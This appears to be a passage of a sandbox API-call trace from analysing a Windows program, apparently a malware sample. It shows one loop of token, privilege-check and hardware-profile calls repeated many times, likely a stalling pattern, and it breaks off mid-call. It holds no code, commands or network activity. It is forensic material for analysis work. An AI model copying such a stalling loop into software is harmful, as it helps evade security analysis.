0x0 [0016.851] GetCurrentThread () returned 0xfffffffe [0016.851] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.851] GetLastError () returned 0x3f0 [0016.851] GetCurrentProcess () returned 0xffffffff [0016.851] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.851] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.852] SetLastError (dwErrCode=0x522) [0016.852] CloseHandle (hObject=0x114) returned 1 [0016.852] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.852] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.852] GetLastError () returned 0x578 [0016.852] SetLastError (dwErrCode=0x578) [0016.852] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.852] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.852] GetCurrentThread () returned 0xfffffffe [0016.852] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.852] GetLastError () returned 0x3f0 [0016.852] GetCurrentProcess () returned 0xffffffff [0016.852] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.852] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.852] SetLastError (dwErrCode=0x522) [0016.852] CloseHandle (hObject=0x114) returned 1 [0016.852] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.852] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.852] GetLastError () returned 0x578 [0016.852] SetLastError (dwErrCode=0x578) [0016.852] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.852] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.852] GetCurrentThread () returned 0xfffffffe [0016.852] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.852] GetLastError () returned 0x3f0 [0016.853] GetCurrentProcess () returned 0xffffffff [0016.853] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.853] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.853] SetLastError (dwErrCode=0x522) [0016.853] CloseHandle (hObject=0x114) returned 1 [0016.853] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.853] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.853] GetLastError () returned 0x578 [0016.853] SetLastError (dwErrCode=0x578) [0016.853] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.853] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.853] GetCurrentThread () returned 0xfffffffe [0016.853] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.853] GetLastError () returned 0x3f0 [0016.853] GetCurrentProcess () returned 0xffffffff [0016.853] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.853] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.853] SetLastError (dwErrCode=0x522) [0016.853] CloseHandle (hObject=0x114) returned 1 [0016.853] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.853] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.853] GetLastError () returned 0x578 [0016.853] SetLastError (dwErrCode=0x578) [0016.853] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.853] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.854] GetCurrentThread () returned 0xfffffffe [0016.854] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.854] GetLastError () returned 0x3f0 [0016.854] GetCurrentProcess () returned 0xffffffff [0016.854] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.854] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.854] SetLastError (dwErrCode=0x522) [0016.854] CloseHandle (hObject=0x114) returned 1 [0016.854] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.854] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.854] GetLastError () returned 0x578 [0016.854] SetLastError (dwErrCode=0x578) [0016.854] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.854] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.854] GetCurrentThread () returned 0xfffffffe [0016.854] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.854] GetLastError () returned 0x3f0 [0016.854] GetCurrentProcess () returned 0xffffffff [0016.854] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.854] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.854] SetLastError (dwErrCode=0x522) [0016.854] CloseHandle (hObject=0x114) returned 1 [0016.854] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.854] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.854] GetLastError () returned 0x578 [0016.855] SetLastError (dwErrCode=0x578) [0016.855] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.855] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.855] GetCurrentThread () returned 0xfffffffe [0016.855] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.855] GetLastError () returned 0x3f0 [0016.855] GetCurrentProcess () returned 0xffffffff [0016.855] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.855] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.855] SetLastError (dwErrCode=0x522) [0016.855] CloseHandle (hObject=0x114) returned 1 [0016.855] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.855] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.855] GetLastError () returned 0x578 [0016.855] SetLastError (dwErrCode=0x578) [0016.855] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.855] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.855] GetCurrentThread () returned 0xfffffffe [0016.855] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.855] GetLastError () returned 0x3f0 [0016.855] GetCurrentProcess () returned 0xffffffff [0016.855] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.855] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.855] SetLastError (dwErrCode=0x522) [0016.856] CloseHandle (hObject=0x114) returned 1 [0016.856] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.856] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.856] GetLastError () returned 0x578 [0016.856] SetLastError (dwErrCode=0x578) [0016.856] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.856] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.856] GetCurrentThread () returned 0xfffffffe [0016.856] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.856] GetLastError () returned 0x3f0 [0016.856] GetCurrentProcess () returned 0xffffffff [0016.856] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.856] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.856] SetLastError (dwErrCode=0x522) [0016.856] CloseHandle (hObject=0x114) returned 1 [0016.856] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.856] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.856] GetLastError () returned 0x578 [0016.856] SetLastError (dwErrCode=0x578) [0016.856] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.856] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.856] GetCurrentThread () returned 0xfffffffe [0016.856] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.856] GetLastError () returned 0x3f0 [0016.857] GetCurrentProcess () returned 0xffffffff [0016.857] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.857] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.857] SetLastError (dwErrCode=0x522) [0016.857] CloseHandle (hObject=0x114) returned 1 [0016.857] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.857] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.857] GetLastError () returned 0x578 [0016.857] SetLastError (dwErrCode=0x578) [0016.857] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.857] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.857] GetCurrentThread () returned 0xfffffffe [0016.857] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.857] GetLastError () returned 0x3f0 [0016.857] GetCurrentProcess () returned 0xffffffff [0016.857] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.857] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.857] SetLastError (dwErrCode=0x522) [0016.857] CloseHandle (hObject=0x114) returned 1 [0016.857] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.857] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.857] GetLastError () returned 0x578 [0016.857] SetLastError (dwErrCode=0x578) [0016.857] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.857] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.858] GetCurrentThread () returned 0xfffffffe [0016.858] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.858] GetLastError () returned 0x3f0 [0016.858] GetCurrentProcess () returned 0xffffffff [0016.858] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.858] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.858] SetLastError (dwErrCode=0x522) [0016.858] CloseHandle (hObject=0x114) returned 1 [0016.858] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.858] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.858] GetLastError () returned 0x578 [0016.858] SetLastError (dwErrCode=0x578) [0016.858] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.858] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.858] GetCurrentThread () returned 0xfffffffe [0016.858] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.858] GetLastError () returned 0x3f0 [0016.858] GetCurrentProcess () returned 0xffffffff [0016.858] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.858] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.858] SetLastError (dwErrCode=0x522) [0016.858] CloseHandle (hObject=0x114) returned 1 [0016.858] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.858] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.858] GetLastError () returned 0x578 [0016.859] SetLastError (dwErrCode=0x578) [0016.859] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.859] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.859] GetCurrentThread () returned 0xfffffffe [0016.859] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.859] GetLastError () returned 0x3f0 [0016.859] GetCurrentProcess () returned 0xffffffff [0016.859] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.859] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.859] SetLastError (dwErrCode=0x522) [0016.859] CloseHandle (hObject=0x114) returned 1 [0016.859] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.859] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.859] GetLastError () returned 0x578 [0016.859] SetLastError (dwErrCode=0x578) [0016.859] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.859] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.859] GetCurrentThread () returned 0xfffffffe [0016.859] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.860] GetLastError () returned 0x3f0 [0016.860] GetCurrentProcess () returned 0xffffffff [0016.860] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.860] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.860] SetLastError (dwErrCode=0x522) [0016.860] CloseHandle (hObject=0x114) returned 1 [0016.860] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.860] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.860] GetLastError () returned 0x578 [0016.860] SetLastError (dwErrCode=0x578) [0016.860] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.860] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.860] GetCurrentThread () returned 0xfffffffe [0016.860] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.860] GetLastError () returned 0x3f0 [0016.860] GetCurrentProcess () returned 0xffffffff [0016.860] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.860] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.860] SetLastError (dwErrCode=0x522) [0016.860] CloseHandle (hObject=0x114) returned 1 [0016.860] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.860] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.860] GetLastError () returned 0x578 [0016.860] SetLastError (dwErrCode=0x578) [0016.860] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.861] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.861] GetCurrentThread () returned 0xfffffffe [0016.861] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.861] GetLastError () returned 0x3f0 [0016.861] GetCurrentProcess () returned 0xffffffff [0016.861] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.861] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.861] SetLastError (dwErrCode=0x522) [0016.861] CloseHandle (hObject=0x114) returned 1 [0016.861] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.861] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.861] GetLastError () returned 0x578 [0016.861] SetLastError (dwErrCode=0x578) [0016.861] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.861] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.861] GetCurrentThread () returned 0xfffffffe [0016.861] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.861] GetLastError () returned 0x3f0 [0016.861] GetCurrentProcess () returned 0xffffffff [0016.861] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.861] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.861] SetLastError (dwErrCode=0x522) [0016.861] CloseHandle (hObject=0x114) returned 1 [0016.861] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.862] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.862] GetLastError () returned 0x578 [0016.862] SetLastError (dwErrCode=0x578) [0016.862] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.862] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.862] GetCurrentThread () returned 0xfffffffe [0016.862] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.862] GetLastError () returned 0x3f0 [0016.862] GetCurrentProcess () returned 0xffffffff [0016.862] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.862] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.862] SetLastError (dwErrCode=0x522) [0016.862] CloseHandle (hObject=0x114) returned 1 [0016.862] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.862] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.862] GetLastError () returned 0x578 [0016.862] SetLastError (dwErrCode=0x578) [0016.862] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.862] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.862] GetCurrentThread () returned 0xfffffffe [0016.862] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.862] GetLastError () returned 0x3f0 [0016.862] GetCurrentProcess () returned 0xffffffff [0016.862] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.862] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.863] SetLastError (dwErrCode=0x522) [0016.863] CloseHandle (hObject=0x114) returned 1 [0016.863] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.863] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.863] GetLastError () returned 0x578 [0016.863] SetLastError (dwErrCode=0x578) [0016.863] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.863] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.863] GetCurrentThread () returned 0xfffffffe [0016.863] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.863] GetLastError () returned 0x3f0 [0016.863] GetCurrentProcess () returned 0xffffffff [0016.863] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.863] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.863] SetLastError (dwErrCode=0x522) [0016.863] CloseHandle (hObject=0x114) returned 1 [0016.863] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.863] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.863] GetLastError () returned 0x578 [0016.863] SetLastError (dwErrCode=0x578) [0016.863] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.863] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.863] GetCurrentThread () returned 0xfffffffe [0016.863] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.864] GetLastError () returned 0x3f0 [0016.864] GetCurrentProcess () returned 